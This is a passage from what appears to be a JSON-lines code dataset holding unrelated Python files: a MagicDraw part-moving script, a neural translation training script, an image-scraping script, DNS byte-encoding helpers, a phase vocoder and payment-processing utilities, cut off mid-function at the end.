SRUtils.nestedEndS, \"propertyPath\", path, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n portend.setPartWithPort(newProp)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n copyPropertyPaths(oppend, newoppend)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", ownerPart, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n portend.setPartWithPort(newProp)\n mem.removeElement(end.get_connectorOfEnd())\n \n \n \ndef movePartUp(part, newOwner, partInOwner):\n ends = part.getEnd()\n \n newasso = ef.createAssociationInstance()\n newasso.setOwner(newOwner.getOwner())\n newProp = newasso.getMemberEnd().get(0)\n newProp2 = newasso.getMemberEnd().get(1)\n newProp.setType(part.getType())\n newProp2.setType(newOwner)\n newProp.setOwner(newOwner)\n newProp2.setOwner(newasso)\n newProp.setAggregation(part.getAggregation())\n newProp.setName(part.getName())\n copyMultiplicity(part, newProp)\n\n MDUtils.copyStereotypes(part, newProp)\n bad = []\n for end in ends:\n oppend = findOppositeEnd(part, end, end.get_connectorOfEnd())\n if oppend.getRole() is part:\n bad.append(end)\n continue\n newconn = ef.createConnectorInstance()\n partend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n partend.setRole(newProp)\n newoppend.setRole(oppend.getRole())\n \n if not StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n if end.get_connectorOfEnd().getOwner() is part.getType():\n newconn.setOwner(part.getType())\n copyPropertyPaths(oppend, newoppend)\n else:\n newconn.setOwner(newOwner)\n if oppend.getRole() is not partInOwner:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", partInOwner, True)\n copyPropertyPaths(oppend, newoppend)\n else:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None:\n connectorOwner = end.get_connectorOfEnd().getOwner()\n newpaths = []\n findPath(connectorOwner, newProp, newpaths)\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(partend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n copyPropertyPaths(oppend, newoppend)\n movePartUpPorts(part, newOwner, partInOwner, newProp)\n movePartUpChildren(part, newOwner, partInOwner, newProp)\n if len(bad) > 0:\n gl.log(\"There's one or more connector from the original part to itself, those are not replicated\")\n mem.removeElement(part)\n\ndef movePartUpChildren(part, newOwner, partInOwner, newProp):\n childs = []\n findAllChildrenParts(part, childs)\n for child in childs:\n for end in list(child.getEnd()):\n if StereotypesHelper.hasStereotype(end, SRUtils.nestedEndS):\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if paths is not None and part in paths:\n index = paths.indexOf(part)\n if index > 0:\n if paths[index-1] is partInOwner:\n newconn = ef.createConnectorInstance()\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n thisend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n thisend.setRole(end.getRole())\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newoppend.setRole(oppend.getRole())\n firstpart = paths[:index-1]\n secondpart = paths[index+1:]\n newpath = []\n newpath.extend(firstpart)\n newpath.append(newProp)\n newpath.extend(secondpart)\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n copyPropertyPaths(oppend, newoppend)\n mem.removeElement(end.get_connectorOfEnd())\n else:\n pass #this means this connector is going through some other part whose type originally owns part, but since part's no longer under type, what happens?\n else:\n # this means the connector is owned by something that owns a part whose type used to contain part, the connector needs to move up\n newconn = ef.createConnectorInstance()\n newconn.setOwner(newOwner)\n newpath = [newProp]\n newpath.extend(paths[1:])\n thisend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n thisend.setRole(end.getRole())\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newoppend.setRole(oppend.getRole())\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(thisend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n opppath = StereotypesHelper.getStereotypePropertyValue(oppend, SRUtils.nestedEndS, \"propertyPath\")\n if oppend.getRole() is partInOwner:\n pass\n else:\n newpath = [partInOwner]\n newpath.extend(opppath)\n for path in newpath:\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n mem.removeElement(end.get_connectorOfEnd())\n else:\n pass #no need to fix?\n else:\n pass #no need to fix?\n \n\n\ndef movePartUpPorts(part, newOwner, partInOwner, newProp):\n portends = findPortEnds(part)\n for end in portends:\n oppend = findOppositeEnd(end.getRole(), end, end.get_connectorOfEnd())\n newconn = ef.createConnectorInstance()\n newconn.getEnd().get(0).setRole(end.getRole())\n newconn.getEnd().get(1).setRole(oppend.getRole())\n portend = newconn.getEnd().get(0)\n newoppend = newconn.getEnd().get(1)\n portend.setPartWithPort(newProp)\n paths = StereotypesHelper.getStereotypePropertyValue(end, SRUtils.nestedEndS, \"propertyPath\")\n if len(paths) > 1:\n newconn.setOwner(end.get_connectorOfEnd().getOwner())\n newpaths = paths[:-2]\n for path in newpaths:\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", path, True)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n copyPropertyPaths(oppend, newoppend)\n else:\n newconn.setOwner(newOwner)\n StereotypesHelper.setStereotypePropertyValue(portend, SRUtils.nestedEndS, \"propertyPath\", newProp, True)\n StereotypesHelper.setStereotypePropertyValue(newoppend, SRUtils.nestedEndS, \"propertyPath\", partInOwner, True)\n copyPropertyPaths(oppend, newoppend)\n mem.removeElement(end.get_connectorOfEnd())\n \n \ndef findPath(owner, part, parts):\n for attr in owner.getOwnedAttribute():\n if attr is part:\n return True\n parts.append(attr)\n attrtype = attr.getType()\n if attrtype is not None and isinstance(attrtype, Class):\n if findPath(attrtype, part, parts):\n return True\n parts.remove(attr)\n return False\n \ndef findPortEnds(part):\n partType = part.getType()\n ports = []\n ends = []\n for attr in partType.getOwnedAttribute():\n if isinstance(attr, Port):\n ports.append(attr)\n for port in ports:\n for end in port.getEnd():\n if end.getPartWithPort() is part:\n ends.append(end)\n return ends\n \ndef moveup(part):\n partowner = part.getOwner()\n parts = findPartsTypedBy(partowner)\n owners = []\n for part1 in parts:\n if part1.getOwner() not in owners and isinstance(part1.getOwner(), Class):\n owners.append(part1.getOwner())\n owner = MDUtils.getUserDropdownSelection(\"Choose new owner\", \"choose new owner\", owners)\n ownerpart = None\n for attr in owner.getOwnedAttribute():\n if attr.getType() is partowner:\n ownerpart = attr\n movePartUp(part, owner, ownerpart)\n \ndef movedown(part):\n parts = findPeerParts(part)\n ownerPart = MDUtils.getUserDropdownSelection(\"Choose part\", \"Choose which peer part you want to move under:\", parts)\n movePartDown(part, ownerPart.getType(), ownerPart)\n\ndef run(mode):\n selected = None\n if mode == 'b':\n selected = Application.getInstance().getMainFrame().getBrowser().getActiveTree().getSelectedNode().getUserObject()\n if mode == 'd':\n selected = Application.getInstance().getProject().getActiveDiagram().getSelected().get(0).getElement()\n if not isinstance(selected, Property):\n gl.log(\"You must select a part!!!\")\n return\n gl.log('selected: '+ selected.getQualifiedName())\n try:\n SessionManager.getInstance().createSession(\"movepart\")\n choice = JOptionPane.showConfirmDialog(None, \"move part up?\" , \"Delete Type Block?\", JOptionPane.YES_NO_OPTION)\n if choice == JOptionPane.YES_OPTION:\n moveup(selected)\n else:\n movedown(selected)\n SessionManager.getInstance().closeSession()\n except:\n SessionManager.getInstance().cancelSession()\n exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()\n messages=traceback.format_exception(exceptionType, exceptionValue, exceptionTraceback)\n for message in messages:\n gl.log(message)","sub_path":"SystemsReasoner/EHMMovePart.py","file_name":"EHMMovePart.py","file_ext":"py","file_size_in_byte":21407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"436652824","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os, sys\nWMT_ROOT = os.environ[\"WMT_ROOT\"]\nassert WMT_ROOT\n\nfrom argparse import ArgumentParser\n\nfrom deepy import *\nfrom deepy.trainers.trainers import FineTuningAdaGradTrainer\nfrom neuralmt import TMCostLayer, SoftAttentionalLayer\n\ntheano.config.compute_test_value = 'ignore'\n\ncounter = 0\n\nif __name__ == '__main__':\n ap = ArgumentParser()\n ap.add_argument(\"--model_path\", default=\"{}/models/model1.uncompressed.npz\".format(WMT_ROOT))\n ap.add_argument(\"--word_embed\", default=1000, type=int)\n ap.add_argument(\"--src_vocab_size\", default=80000, type=int)\n ap.add_argument(\"--tgt_vocab_size\", default=40000, type=int)\n ap.add_argument(\"--hidden_size\", default=1000, type=int)\n args = ap.parse_args()\n\n src_var = create_var(T.imatrix(), test_shape=[64, 10], test_dtype=\"int32\")\n src_mask_var = create_var(T.matrix(), test_shape=[64, 10], test_dtype=\"float32\")\n tgt_var = create_var(T.imatrix(), test_shape=[64, 10], test_dtype=\"int32\")\n tgt_mask_var = create_var(T.matrix(), test_shape=[64, 10], test_dtype=\"float32\")\n\n encoder = Block()\n decoder = Block()\n expander = Block()\n\n src_embed_layer = WordEmbedding(args.word_embed, args.src_vocab_size)\n\n encoder_embed = src_embed_layer.belongs_to(encoder).compute(src_var, mask=src_mask_var)\n\n # encoder\n forward_rnn_var = (GRU(args.hidden_size,input_type=\"sequence\", output_type=\"sequence\", mask=src_mask_var)\n .belongs_to(encoder).compute(encoder_embed))\n backward_rnn_var = Chain(GRU(args.hidden_size, input_type=\"sequence\", output_type=\"sequence\", mask=src_mask_var, backward=True),\n Reverse3D()).belongs_to(encoder).compute(encoder_embed)\n hidden_layer = Concatenate(axis=2).compute(forward_rnn_var, backward_rnn_var)\n\n # decoder\n # the first token is =1\n feedback_var = tgt_var.apply(lambda t: T.concatenate([T.ones((t.shape[0], 1), dtype=\"int32\"), t[:, :-1]], axis=1))\n\n tgt_embed_layer = WordEmbedding(args.word_embed, args.tgt_vocab_size)\n tgt_embed_layer.initialize(1)\n\n second_input = tgt_embed_layer.belongs_to(decoder).compute(feedback_var, mask=tgt_mask_var)\n\n second_input = DimShuffle(1, 0, 2).compute(second_input)\n\n\n recurrent_unit = LSTM(args.hidden_size, input_type=\"sequence\", output_type=\"sequence\", additional_input_dims=[args.word_embed])\n\n attention_layer = SoftAttentionalLayer(recurrent_unit)\n attention_var = attention_layer.belongs_to(decoder).compute(hidden_layer, mask=src_mask_var, feedback=second_input, steps=tgt_var.shape[1])\n\n # expander\n output_var = Chain(Dense(600), Dense(args.tgt_vocab_size)).belongs_to(expander).compute(attention_var)\n\n cost = TMCostLayer(tgt_var, tgt_mask_var, args.tgt_vocab_size).compute(output_var)\n\n\n model = ComputationalGraph(input_vars=[src_var, src_mask_var],\n target_vars=[tgt_var, tgt_mask_var],\n blocks=[encoder, decoder, expander],\n cost=cost)\n\n data = OnDiskDataset(\"{}/aspec.enja1_train.pkl\".format(WMT_ROOT),\n valid_path=\"{}/aspec.enja1_valid.pkl\".format(WMT_ROOT),\n cached=True, shuffle_memory=False)\n\n # Train\n training_config = {\"gradient_clipping\": 3,\n \"auto_save\": args.model_path,\n \"patience\": 20}\n\n trainer = MultiGPUTrainer(model, training_config, method='sgd',\n learning_rate=1.0, step_len=10)\n\n trainer.run(data)","sub_path":"examples/lstm_search/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"438471206","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport os\nimport urllib.request\nimport time\n\ndef find_imgs(html):\n soup=BeautifulSoup(html,\"html.parser\")\n imgs_data=soup.find_all('p')\n print(len(imgs_data))\n for i in range (len(imgs_data)):\n try:\n img_url=imgs_data[i].find('img').get('src')\n img_name=str(i+1)+\".png\"\n img_url=\"https\"+img_url.split(\"https\")[1]\n print(img_name,img_url)\n getAndSaveImg(img_url, img_name)\n except AttributeError as e:\n pass\n\n\n#保存图片\ndef createFileWithFileName(localPathParam,fileName):\n isExists = os.path.exists(localPathParam)\n if not isExists:\n # 如果不存在则创建目录\n # 创建目录操作函数\n os.makedirs(localPathParam)\n print(localPathParam + ' 创建成功')\n totalPath=localPathParam+'\\\\'+fileName\n if not os.path.exists(totalPath):\n file=open(totalPath,'a+')\n file.close()\n return totalPath\n\n\n#保存图片\ndef getAndSaveImg(img_url, img_name):\n if (len(img_url) != 0):\n fileName = img_name\n file_path=u\"D:\\\\BI\\\\HUAWEI\\\\img\"\n urllib.request.urlretrieve(img_url, createFileWithFileName(file_path, fileName))\n\n\n\nif __name__==\"__main__\":\n #从数据表获取数据\n browser = \"Firefox\"\n if browser == \"Chrome\":\n options = webdriver.ChromeOptions()\n # options.add_experimental_option(\"excludeSwitches\", [\"ignore-certificate-errors\"]) #去掉不受支持的命令行标记\n options.add_argument(\n '--user-data-dir=C:/Users/CC-SERVER/AppData/Local/Google/Chrome/User Data/Default') # 设置成用户自己的数据目录\n driver = webdriver.Chrome(chrome_options=options)\n else:\n if browser == \"Firefox\":\n driver = webdriver.Firefox()\n else:\n driver = webdriver.PhantomJS()\n\n url=\"http://www.hroot.com/d-9367999.hr?%E9%87%8D%E7%A3%85%EF%BC%9A%E5%8D%8E%E4%B8%BA%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%BA%B2%E8%A6%812.0%EF%BC%8C87%E9%A1%B5PPT%E5%85%A8%E6%8F%AD%E7%A7%98%EF%BC%81-HR360%E5%B7%A5%E5%9D%8A-hr\"\n driver.get(url)\n time.sleep(5)\n html=driver.page_source\n find_imgs(html)","sub_path":"日常工作/华为ppt.py","file_name":"华为ppt.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"113763633","text":"import socket\nimport struct\nimport ipaddress\n\nimport Tools\nimport Constants\n\n''' This method takes data, headerID, flag bytes, Question count,\n Answer count, Authority count and Additional count\n and constructs header bytes using them and puts them in data\n and returns it.\n'''\n\n\ndef construct_header(header_id, flags, q_count,\n an_count, ath_count, add_count):\n data = bytearray()\n data += short_to_bytes(header_id)\n data += short_to_bytes(flags)\n data += short_to_bytes(q_count)\n data += short_to_bytes(an_count)\n data += short_to_bytes(ath_count)\n data += short_to_bytes(add_count)\n\n return data\n\n\n''' This method takes question object and converts it\n to byte array. '''\n\n\ndef question_to_bytes(question):\n return construct_question(question.q_name,\n question.q_type,\n question.q_class)\n\n\n''' This method takes data, q_name, q_type, q_class and\n constructs Question bytes using them and puts it in data\n and returns it.\n'''\n\n\ndef construct_question(q_name, q_type, q_class):\n data = get_bytes_from_domain_name(q_name.split(\".\"))\n # add Question type bytes\n data += short_to_bytes(q_type)\n # add Question class bytes\n data += short_to_bytes(q_class)\n\n return data\n\n\n''' this method takes answer object and converts it\n to byte array. '''\n\n\ndef answer_to_bytes(answer):\n return construct_answer(answer.a_name, answer.a_type,\n answer.a_class, answer.a_ttl,\n answer.rdlength, answer.response_data)\n\n\n''' This method takes a_name, a_type, a_class, ttl, rd_length and r_data\n parameters of Answer field and constructs answer bytes by them. '''\n\n\ndef construct_answer(a_name, a_type, a_class, ttl, rd_length, r_data):\n data = get_bytes_from_domain_name(a_name.split(\".\"))\n data += short_to_bytes(a_type)\n data += short_to_bytes(a_class)\n data += int_to_bytes(ttl)\n\n byte_rdata = get_bytes_from_rdata(r_data, a_type, rd_length)\n\n data += short_to_bytes(len(byte_rdata))\n data += byte_rdata\n\n return data\n\n\n''' This method takes authority object and converts it to bytes. '''\n\n\ndef authority_to_bytes(authority):\n return construct_byte_authority(authority.name,\n authority.a_type,\n authority.a_class,\n authority.ttl,\n authority.rd_length,\n authority.data)\n\n\n''' This method takes authority parameters and constructs byte array by it. '''\n\n\ndef construct_byte_authority(a_name, a_type, a_class, ttl, rd_length, data):\n\n byte_data = get_bytes_from_domain_name(a_name.split(\".\"))\n byte_data += short_to_bytes(a_type)\n byte_data += short_to_bytes(a_class)\n byte_data += int_to_bytes(ttl)\n byte_domain = get_bytes_from_rdata(data, a_type, rd_length)\n byte_data += short_to_bytes(len(byte_domain))\n byte_data += byte_domain\n\n return byte_data\n\n\n''' This method takes additional object and converts it to bytes. '''\n\n\ndef additional_to_bytes(additional):\n return construct_byte_additional(additional.name,\n additional.a_type,\n additional.a_class,\n additional.ttl,\n additional.rd_length,\n additional.data)\n\n\n''' This method takes authority parameters and constructs byte array by it. '''\n\n\ndef construct_byte_additional(a_name, a_type, a_class, ttl, rd_length, data):\n\n byte_data = get_bytes_from_domain_name(a_name.split(\".\"))\n byte_data += short_to_bytes(a_type)\n byte_data += short_to_bytes(a_class)\n byte_data += int_to_bytes(ttl)\n r_data = get_bytes_from_rdata(data, a_type, rd_length)\n byte_data += short_to_bytes(len(r_data))\n byte_data += r_data\n\n return byte_data\n\n\n''' This method takes r_data and its type and converts it to byte array. '''\n\n\ndef get_bytes_from_rdata(r_data, a_type, rd_length):\n # A\n if a_type == Constants.A:\n ip = struct.unpack(\"!I\", socket.inet_aton(r_data))[0]\n return int_to_bytes(ip)\n\n # AAAA\n if a_type == Constants.AAAA:\n ipv6 = int(ipaddress.IPv6Address(r_data))\n return ipv6int_to_bytes(ipv6)\n\n # NS\n if a_type == Constants.NS:\n byte_data = get_bytes_from_domain_name(r_data.split(\".\"))\n return get_bytes_from_domain_name(r_data.split(\".\"))\n\n # MX\n if a_type == Constants.MX:\n preference, exchange = r_data.split(\" \")\n data_bytes = short_to_bytes(int(preference))\n data_bytes += get_bytes_from_domain_name(exchange.split(\".\"))\n\n return data_bytes\n\n # SOA\n if a_type == Constants.SOA:\n soa_parameters = r_data.split(\" \")\n m_name = soa_parameters[0]\n r_name = soa_parameters[1]\n serial = soa_parameters[2]\n refresh = soa_parameters[3]\n retry = soa_parameters[4]\n expire = soa_parameters[5]\n minimum = soa_parameters[6]\n\n byte_data = get_bytes_from_domain_name(m_name.split(\".\"))\n byte_data += get_bytes_from_domain_name(r_name.split(\".\"))\n byte_data += int_to_bytes(int(serial))\n byte_data += int_to_bytes(int(refresh))\n byte_data += int_to_bytes(int(retry))\n byte_data += int_to_bytes(int(expire))\n byte_data += int_to_bytes(int(minimum))\n\n return byte_data\n\n # TXT\n if a_type == Constants.TXT:\n byte_data = bytes(r_data, 'utf-8')\n text_len = len(byte_data)\n r_data = chr(text_len) + r_data\n\n return bytes(r_data, 'utf-8')\n\n # CNAME\n if a_type == Constants.CNAME:\n return get_bytes_from_domain_name(r_data.split(\".\"))\n\n # unknown\n return bytes(r_data)\n\n\n''' This method converts 128 bit integer\n to byte data. '''\n\n\ndef ipv6int_to_bytes(ipv6):\n left_bytes = ipv6 >> 64\n right_bytes = ipv6 % (1 << 64)\n\n data = long_to_bytes(left_bytes)\n data += long_to_bytes(right_bytes)\n\n return data\n\n\n''' This method converts 64 bit integer\n to byte data. '''\n\n\ndef long_to_bytes(long):\n left_bytes = long >> 32\n right_bytes = long % (1 << 32)\n\n data = int_to_bytes(left_bytes)\n data += int_to_bytes(right_bytes)\n\n return data\n\n\n''' This method takes int type number, splits these bytes\n and adds in byte array one-by-one.\n'''\n\n\ndef int_to_bytes(four_bytes):\n data = bytearray()\n data += short_to_bytes(four_bytes >> 16)\n data += short_to_bytes(four_bytes % (1 << 16))\n\n return data\n\n\n''' This method takes short type number, splits these bytes\n and adds in byte array one-by-one.\n'''\n\n\ndef short_to_bytes(two_bytes):\n # two_bytes = socket.htons(two_bytes)\n data = bytearray()\n data.append(two_bytes >> 8)\n data.append(two_bytes % (1 << 8))\n\n return data\n\n\ndef get_bytes_from_domain_name(domain_name_zones):\n domain_name_bytes = bytearray()\n\n for zone in domain_name_zones:\n if len(zone) > 0:\n zone_bytes = get_bytes(zone)\n for zone_byte in zone_bytes:\n domain_name_bytes.append(zone_byte)\n\n # indicated the end of string\n domain_name_bytes.append(0x00)\n return domain_name_bytes\n\n\ndef get_bytes(zone):\n arr = bytearray()\n arr.append(len(zone))\n for ch in zone:\n arr.append(ord(ch))\n\n return arr\n","sub_path":"DNS Server/Constructor.py","file_name":"Constructor.py","file_ext":"py","file_size_in_byte":7457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"482940475","text":"import pyaudio\nimport numpy, wave\nimport pianoputer\n\nclass PhaseVocoder:\n def __init__(self, file_name):\n self.chunk = 8192*8\n self.wf = wave.open(file_name, 'rb')\n \n self.tempo = 0.5\n self.pitch = 5\n \n # Performs the STFT on a chunk of data and returns the new data\n def analyze_data(self, data):\n new_data = pianoputer.pitchshift(data, self.pitch, self.tempo, 2**12, 2**10)\n\n return new_data\n \n # Writes new audio to a file\n def write_data(self, data):\n output = wave.open(\"output_both2.wav\", 'wb')\n output.setnchannels(self.wf.getnchannels())\n output.setsampwidth(self.wf.getsampwidth())\n output.setframerate(self.wf.getframerate())\n output.writeframes(b''.join(data))\n output.close()\n \n # Performs the phase vocoding algorithm\n def start(self):\n unformatted = self.wf.readframes(self.wf.getnframes())\n data = numpy.fromstring(unformatted, numpy.int16)\n \n new_data = self.analyze_data(data).astype(numpy.int16).tostring()\n\n self.write_data(new_data)\n \nif __name__ == \"__main__\":\n pv = PhaseVocoder(\"92002__jcveliz__violin-origional.wav\")\n pv.start()","sub_path":"phase_vocoder3.py","file_name":"phase_vocoder3.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"7594280","text":"import json\nimport logging\nfrom decimal import Decimal\nfrom functools import wraps\nfrom typing import Dict\n\nfrom django.conf import settings\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db import transaction\nfrom django.utils.translation import pgettext_lazy\n\nfrom . import (\n ChargeStatus, CustomPaymentChoices, GatewayError, OperationType,\n PaymentError, TransactionKind, get_payment_gateway)\nfrom ..account.models import Address, User\nfrom ..checkout.models import Cart\nfrom ..core import analytics\nfrom ..task import TaskEvents, TaskEventsEmails\nfrom ..task.emails import send_payment_confirmation\nfrom ..task.models import Task\nfrom .models import Payment, Transaction\n\nlogger = logging.getLogger(__name__)\n\nGENERIC_TRANSACTION_ERROR = 'Transaction was unsuccessful'\nREQUIRED_GATEWAY_KEYS = {\n 'transaction_id', 'is_success', 'kind', 'error', 'amount', 'currency'}\nALLOWED_GATEWAY_KINDS = {choices[0] for choices in TransactionKind.CHOICES}\n\n\ndef get_gateway_operation_func(gateway, operation_type):\n \"\"\"Return gateway method based on the operation type to be performed.\"\"\"\n if operation_type == OperationType.PROCESS_PAYMENT:\n return gateway.process_payment\n if operation_type == OperationType.AUTH:\n return gateway.authorize\n if operation_type == OperationType.CAPTURE:\n return gateway.capture\n if operation_type == OperationType.CHARGE:\n return gateway.charge\n if operation_type == OperationType.VOID:\n return gateway.void\n if operation_type == OperationType.REFUND:\n return gateway.refund\n\n\ndef create_payment_information(\n payment: Payment, payment_token: str = None,\n amount: Decimal = None) -> Dict:\n \"\"\"Extracts task information along with payment details.\n\n Returns information required to process payment and additional\n billing/delivery addresses for optional fraud-prevention mechanisms.\n \"\"\"\n return {\n 'token': payment_token,\n 'amount': amount or payment.total,\n 'currency': payment.currency,\n 'billing': (\n payment.task.billing_address.as_data()\n if payment.task.billing_address else None),\n 'delivery': (\n payment.task.delivery_address.as_data()\n if payment.task.delivery_address else None),\n 'task_id': payment.task.id,\n 'customer_ip_address': payment.customer_ip_address,\n 'customer_email': payment.billing_email}\n\n\ndef handle_fully_paid_order(task):\n task.events.create(type=TaskEvents.TASK_FULLY_PAID.value)\n if task.get_user_current_email():\n send_payment_confirmation.delay(task.pk)\n task.events.create(\n type=TaskEvents.EMAIL_SENT.value,\n parameters={\n 'email': task.get_user_current_email(),\n 'email_type': TaskEventsEmails.PAYMENT.value})\n try:\n analytics.report_order(task.tracking_client_id, task)\n except Exception:\n # Analytics failing should not abort the checkout flow\n logger.exception('Recording task in analytics failed')\n\n\ndef require_active_payment(view):\n \"\"\"Require an active payment instance.\n\n Decorate a view to check if payment is authorized, so any actions\n can be performed on it.\n \"\"\"\n @wraps(view)\n def func(payment: Payment, *args, **kwargs):\n if not payment.is_active:\n raise PaymentError('This payment is no longer active.')\n return view(payment, *args, **kwargs)\n return func\n\n\ndef create_payment(\n gateway: str,\n total: Decimal,\n currency: str,\n email: str,\n billing_address: Address,\n customer_ip_address: str = '',\n payment_token: str = '',\n extra_data: Dict = None,\n checkout: Cart = None,\n task: Task = None) -> Payment:\n \"\"\"Create a payment instance.\n\n This method is responsible for creating payment instances that works for\n both Django views and GraphQL mutations.\n \"\"\"\n defaults = {\n 'billing_email': email,\n 'billing_first_name': billing_address.first_name,\n 'billing_last_name': billing_address.last_name,\n 'billing_company_name': billing_address.company_name,\n 'billing_address_1': billing_address.street_address_1,\n 'billing_address_2': billing_address.street_address_2,\n 'billing_city': billing_address.city,\n 'billing_postal_code': billing_address.postal_code,\n 'billing_country_code': billing_address.country.code,\n 'billing_country_area': billing_address.country_area,\n 'currency': currency,\n 'gateway': gateway,\n 'total': total}\n\n if extra_data is None:\n extra_data = {}\n\n data = {\n 'is_active': True,\n 'customer_ip_address': customer_ip_address,\n 'extra_data': extra_data,\n 'token': payment_token}\n\n if task is not None:\n data['task'] = task\n if checkout is not None:\n data['checkout'] = checkout\n\n payment, _ = Payment.objects.get_or_create(defaults=defaults, **data)\n return payment\n\n\n@transaction.atomic\ndef mark_task_as_paid(task: Task, request_user: User):\n \"\"\"Mark task as paid.\n\n Allows to create a payment for an task without actually performing any\n payment by the gateway.\n \"\"\"\n payment = create_payment(\n gateway=CustomPaymentChoices.MANUAL,\n payment_token='',\n currency=task.total.gross.currency,\n email=task.user_email,\n billing_address=task.billing_address,\n total=task.total.gross.amount,\n task=task)\n payment.charge_status = ChargeStatus.FULLY_CHARGED\n payment.captured_amount = task.total.gross.amount\n payment.save(update_fields=['captured_amount', 'charge_status'])\n task.events.create(\n type=TaskEvents.TASK_MARKED_AS_PAID.value, user=request_user)\n\n\ndef create_transaction(\n payment: Payment, kind: str, payment_information: Dict,\n gateway_response: Dict = None, error_msg=None) -> Transaction:\n \"\"\"Create a transaction based on transaction kind and gateway response.\"\"\"\n if gateway_response is None:\n gateway_response = {}\n\n # Default values for token, amount, currency are only used in cases where\n # response from gateway was invalid or an exception occured\n txn = Transaction.objects.create(\n payment=payment,\n kind=gateway_response.get('kind', kind),\n token=gateway_response.get(\n 'transaction_id', payment_information['token']),\n is_success=gateway_response.get('is_success', False),\n amount=gateway_response.get('amount', payment_information['amount']),\n currency=gateway_response.get(\n 'currency', payment_information['currency']),\n error=gateway_response.get('error', error_msg),\n gateway_response=gateway_response)\n return txn\n\n\ndef gateway_get_client_token(gateway_name: str):\n \"\"\"Gets client token, that will be used as a customer's identificator for\n client-side tokenization of the chosen payment method.\n \"\"\"\n gateway, gateway_params = get_payment_gateway(gateway_name)\n return gateway.get_client_token(connection_params=gateway_params)\n\n\ndef clean_charge(payment: Payment, amount: Decimal):\n \"\"\"Check if payment can be charged.\"\"\"\n if amount <= 0:\n raise PaymentError('Amount should be a positive number.')\n if not payment.can_charge():\n raise PaymentError('This payment cannot be charged.')\n if amount > payment.total or amount > (\n payment.total - payment.captured_amount):\n raise PaymentError('Unable to charge more than un-captured amount.')\n\n\ndef clean_capture(payment: Payment, amount: Decimal):\n \"\"\"Check if payment can be captured.\"\"\"\n if amount <= 0:\n raise PaymentError('Amount should be a positive number.')\n if not payment.can_capture():\n raise PaymentError('This payment cannot be captured.')\n if amount > payment.total or amount > (\n payment.total - payment.captured_amount):\n raise PaymentError('Unable to capture more than authorized amount.')\n\n\ndef clean_authorize(payment: Payment):\n \"\"\"Check if payment can be authorized.\"\"\"\n if not payment.can_authorize():\n raise PaymentError('Charged transactions cannot be authorized again.')\n\n\ndef clean_mark_task_as_paid(task: Task):\n \"\"\"Check if an task can be marked as paid.\"\"\"\n if task.payments.exists():\n raise PaymentError(\n pgettext_lazy(\n 'Mark task as paid validation error',\n 'Tasks with payments can not be manually marked as paid.'))\n\n\ndef call_gateway(operation_type, payment, payment_token, **extra_params):\n \"\"\"Helper that calls the passed gateway function and handles exceptions.\n\n Additionally does validation of the returned gateway response.\n \"\"\"\n gateway, connection_params = get_payment_gateway(payment.gateway)\n gateway_response = None\n error_msg = None\n\n payment_information = create_payment_information(\n payment, payment_token, **extra_params\n )\n\n try:\n func = get_gateway_operation_func(gateway, operation_type)\n except AttributeError:\n error_msg = 'Gateway doesn\\'t implement {} operation'.format(\n operation_type.name)\n logger.exception(error_msg)\n raise PaymentError(error_msg)\n\n # The transaction kind is provided as a default value\n # for creating transactions when gateway has invalid response\n # The PROCESS_PAYMENT operation has CAPTURE as default transaction kind\n # For other operations, the transaction kind is same wtih operation type\n default_transaction_kind = TransactionKind.CAPTURE\n if operation_type != OperationType.PROCESS_PAYMENT:\n default_transaction_kind = getattr(\n TransactionKind, OperationType(operation_type).name)\n\n # Validate the default transaction kind\n if default_transaction_kind not in dict(TransactionKind.CHOICES):\n error_msg = 'The default transaction kind is invalid'\n logger.exception(error_msg)\n raise PaymentError(error_msg)\n\n try:\n gateway_response = func(\n payment_information=payment_information,\n connection_params=connection_params)\n validate_gateway_response(gateway_response)\n except GatewayError:\n 